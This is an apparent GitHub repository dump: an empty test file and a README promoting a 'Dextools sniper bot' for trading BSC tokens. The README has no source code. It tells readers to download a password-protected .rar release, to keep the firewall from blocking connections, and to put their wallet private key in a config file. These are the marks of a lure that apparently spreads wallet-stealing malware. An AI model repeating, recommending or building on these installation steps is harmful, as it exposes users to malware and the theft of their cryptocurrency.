├── test.js └── README.md /test.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
Sniper bot to buy and sell trending tokens on Dextools.
4 | 5 | ## Getting Started 6 | This bot automatically buys BSC tokens that are trending on Dextools. You can set take-profit and stop-loss percentage. Use at your own risk. Investing in cryptocurrency is risky. This is not financial advice. There is a small 1% buying fee per buy. This is to help me buy a cup of coffee and support for this project. 7 | 8 | ## Requirements 9 | - Windows 7 or older 10 | - .NET framework 4.7.2 runtime 11 | - RPCs for each network (ex. Infura) 12 | 13 | ## Installation (public version) 14 | 1. [Install](https://dotnet.microsoft.com/en-us/download/dotnet-framework/net472) .NET framework 4.7.2 runtime if it has not been installed. 15 | 2. [Download](https://github.com/SniperSwap/dextools-sniper/releases/download/Release/Dextools-v0.2.3.rar) repository release and extract files with password `LrDatfneE`. 16 | 3. Make sure that firewall does not blocks any connections. 17 | 18 |
19 |
20 | ## Usage
21 | 1. Open `config.json`. Edit network PRCs and private key for active account.
22 | 2. Launch software. In transaction section set take-profit and stop-loss percentage.
23 | 4. Start monitoring Dextools and wait for profit.
24 |
25 | ## Contribute
26 | If you can code and want to make this project better please feel free to contribute.
27 |
--------------------------------------------------------------------------------